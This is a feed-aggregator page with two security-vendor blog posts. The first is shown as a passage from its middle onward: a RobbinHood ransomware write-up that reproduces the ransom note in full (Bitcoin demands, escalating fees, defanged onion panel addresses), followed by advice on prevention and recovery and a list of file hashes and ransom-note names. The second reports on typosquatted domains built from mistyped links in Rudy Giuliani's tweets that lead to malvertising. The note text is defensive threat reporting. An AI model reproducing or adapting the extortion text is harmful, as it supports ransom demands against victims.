All your files are encrypted with RSA-4096, Read more on https://en.wikipedia.org/wiki/RSA_(cryptosystem)
RSA is an algorithm used by modern computers to encrypt and decrypt the data. RSA is an asymmetric cryptographic algorithm. Asymmetric means that there are two different keys. This is also called public key cryptography, because one of the keys can be given to anyone:
1 -We encrypted your files with our “Public key”
2 -You can decrypt, the encrypted files with specific “Private key” and your private key is in our hands ( It’s not possible to recover your files without our private key )
Is it possible to get back your data?
Yes, We have a decrypter with all your private keys. We have two options to get all your data back.
Follow the instructions to get all your data back:
OPTION 1
Step 1: You must send us 3 Bitcoin(s) for each affected system
Step 2: Inform us in panel with hostname(s) of the system you want, wait for confirmation and get your
OPTION 2
Step 1: You must send us 13 Bitcoin(s) for all affected system
Step 2: Inform us in panel, wait for confirmation and get all your decrypters
Our Bitcoin address is: xxx BE CAREFUL, THE COST OF YOUR PAYMENT INCREASES $10,000 EACH DAY AFTER THE FOURTH DAY
Access to the panel ( Contact us )The panel address: hxxp://xbt4titax4pzza6w[.]onion/ Alternative addresses
hxxps://xbt4titax4pzza6w.onion[.]pet/
hxxps://xbt4titax4pzza6w.onion[.]to/
Access to the panel using Tor Browser
If non of our links are accessible you can try tor browser to get in touch with us:
Step 1: Download Tor Browser from here: https://www.torproject.org/download/download.html.en
Step 2: Run Tor Browser and wait to connect
Step 3: Visit our website at: panel address
If you’re having a problem with using Tor Browser, Ask Google: how to use tor browser
Wants to make sure we have your decrypter?
To make sure we have your decrypter you can upload at most 3 files (maximum size allowance is 10 MB in total) and get your data back as a demo.
Where to buy Bitcoin?
The easiest way is LocalBitcoins, but you can find more websites to buy bitcoin using Google Search: buy bitcoin online  Decrypting may not be enough

As a warning to those who might consider paying the ransom, as Baltimore and Greenville did: Simply decrypting the files may not be enough to bring systems back online. The introduction of the vulnerable kernel driver and changing the behavior of the kernel may cause other problems on affected systems, which may result in deprecated performance or BSODs.

Reportedly, the recovery from the ransomware attack cost the city of Baltimore over US$10 million, which dwarfs the paid ransom of 13 Bitcoin (roughly US$80,000).

How to prevent RobbinHood ransomware

As with all ransomware families, the best method of protection is preventing the infection from happening in the first place. Since RobbinHood targets organizations, IT and security teams should take the following common precautions to secure against its attack:

Recommended reading: How to protect your RDP access from ransomware attacks

How Malwarebytes protects against ransomware

Malwarebytes can protect systems against RobbinHood ransomware in several ways.

The Malwarebytes Anti-Malware technology detects malicious files, browser modifications, and system modifications on Windows PCs using a combination of signature-based and signatureless technologies. This layer of protection detects the RobbinHood binary itself. Detections can happen in real time as the binary is run or the infection can be rooted out from an already-compromised machine by conducting a full system scan.

Anti-Ransomware is a signatureless technology in charge of monitoring system activity of processes against a certain subset of data in specific locations on the endpoint. Using patented technology, Anti-Ransomware assesses changes in those data files. If an internal scoring threshold is crossed by a monitored process, it triggers a detection from the Anti-Ransomware component.

Malwarebytes Anti-Ransomware recognizes and stops ransomware behavior.

For those already infected, Ransomware Rollback can help recover encrypted files within 72 hours of the attack. Rollback creates a local cache on the endpoint to store changes to files on the system. It can use this cache to help revert changes caused by a threat. The Rollback feature is dependent on activity monitoring available in Malwarebytes Endpoint Detection and Response.

IOCs

Files (SHA256 hashes):

  • 791c32a95f401f7464214960e49e716656f6fd6fff135ac2a6ba607236d3346e
  • 99c3cc348f8ee4e87bce45b1dd185d31830c370ac43fd3e39ac50340f029ef79
  • e9188ace227b00cbf1f6fba3ceb32af8e4d456c3a0815300a224a9d9e00778a8
  • 47d892da6a49b02a2904bdc0d03ecef66c076481d19ab19251d86d11be494765

Ransom notes:

  • _Decrypt_Files.html
  •  _Decryption_ReadMe.html
  • _Help_Help_Help.html
  • _Help_Important.html

Extension of encrypted files:

.enc_robbinhood

Stay safe everyone!

The post Threat spotlight: RobbinHood ransomware takes the driver’s seat appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Rudy Giuliani’s Twitter mishaps invite typosquatters and scammers

Malwarebytes - Wed, 02/19/2020 - 17:21

Former cybersecurity czar Rudy Giuliani has been targeted by typosquatters on Twitter, thanks to copious misspellings and other keyboarding errors made in a number of his public tweets. In a tweet sent out on Sunday, Giuliani meant to send his 650,000-plus followers to his new website, RudyGiulianics.com. Instead, a space added after “Rudy” sent users on a redirection quest that ultimately landed on a web page laced with adware.

Typosquatting has long been used as a way to capitalize on mistakes made by those with clumsy fingers. A mistyped URL, which would normally lead users to a 404 error page, is instead redirected to a completely unrelated site—often one designed for ill intent. For example, let’s say you enter yotube.com into your browser’s address bar instead of youtube.com. Rather than seeing the normal YouTube portal, you will instead be redirected via a few ad networks and most likely end up to a scam page, thanks to the handy work of enterprising typosquatters.

Typosquatting can be a profitable business, as threat actors will register domains lexically close to big brand names or popular websites for heavy traffic gains. The end goal isn’t always to monetize via malvertising redirections—it could be phishing, data theft, or even hacktivism.

In Giuliani’s case, a public political figure has been identified by cybercriminals for his tendency toward typo-laden tweets. In fact, Giuliani’s Twitter account contains numerous tweets with misspellings around his personal website that sometimes lead to trolling attempts or redirect to malvertising schemes. We examine a few of these instances.

Typo leads to political trolling

Here’s a tweet sent from Giuliani’s account using an iPad. Whoever composed that tweet forgot to add a space between the word “Watch” and “rudygiulianics.com”.

As a result, the website becomes Watchrudygiulianics.com which was registered a day after the tweet:

Domain Name: watchrudygiulianics.com Registrar: GoDaddy.com, LLC Creation Date: 2020-02-16T05:23:50Z

Visiting the site immediately redirects users to https://www.drugrehab.com/treatment/, a site for help with substance abuse.

In another example, we see a much more subtle typo for Giuliani’s website, where a single ‘i’ is missing in RUDYGIULIANCS.com (the correct site is rudygiulianics.com).

The domain rudygiuliancs.com was also registered recently (but before the tweet came out, so it either was preemptive registration for a forthcoming typo or perhaps the typo had been made already).

Domain Name: rudygiuliancs.com Registrar: Wild West Domains, LLC Creation Date: 2020-02-07T16:30:38Z

This time, visiting this link redirects visitors to a Wikipedia page for the Trump-Ukraine scandal:

Malvertising and other traffic schemes

As mentioned earlier, typosquatters will typically watch popular domain names and register new ones that are likely going to be a result of a typo. Because Giuliani has over 650,000 followers on Twitter and is a well-known political figure regularly in the headlines, scammers know he’s a good source of potential web traffic purely from typosquatting.

In Sunday’s example, a typo led to a malvertising scheme. This time, a space was inserted between “Rudy” and “Giulianics.com”.

This typo resulted in a link to Giulianics.com, a domain registered at the end of January.

Domain Name: giulianics.com Registrar: GoDaddy.com, LLC Creation Date: 2020-01-31T20:29:50Z

As seen in the image above, a series of redirects will happen once you visit that domain. This is typical for malvertising chains that fingerprint your browser and other settings in order to deliver the appropriate payload.

In this instance, visiting from the United States via Google Chrome, we were served a browser extension called Private Browsing:

Although we did not examine the extension in detail, several comments from the Google Play Store say the extension was forced while browsing the web.

Among other capabilities, it can read your browser history, the data you enter on sites, and can change your default search engine. As a rule of thumb, it is generally recommended to refrain from installing too many browser extensions, especially when they are promoted via unwanted redirects.

In late January, there was a report that visiting Giuliani’s website distributed malware. We weren’t able to confirm it at that time, but in light of the current typo situation, we believe it’s more likely that one of the tweets containing the wrong link led to a malvertising chain, and possibly to a browser locker.

Monitoring popular accounts for mistakes

Many attacks we see in the wild are opportunistic, praying on the latest news or events likely to draw attention. There’s also always been great interest in popular social media accounts, but typically by hacking them directly. In this case, opportunistic actors are waiting for the next typo to happen in order to push out their own message or to monetize on it via malicious redirects.

This serves as a reminder that even well-known or verified social media accounts can send users in unintended directions leading to scams or malware. In a sense, any kind of communication can be abused for an attacker’s own gain by recognizing a pattern of predictable mistakes and immediately acting upon them.

For those wanting protection against such redirections and other malicious website activity, Malwarebytes offers a free browser extension that takes an aggressive stance on blocking malvertising and other dubious schemes.

The post Rudy Giuliani’s Twitter mishaps invite typosquatters and scammers appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Pages

Subscribe to Furiously Eclectic People aggregator - Techie Feeds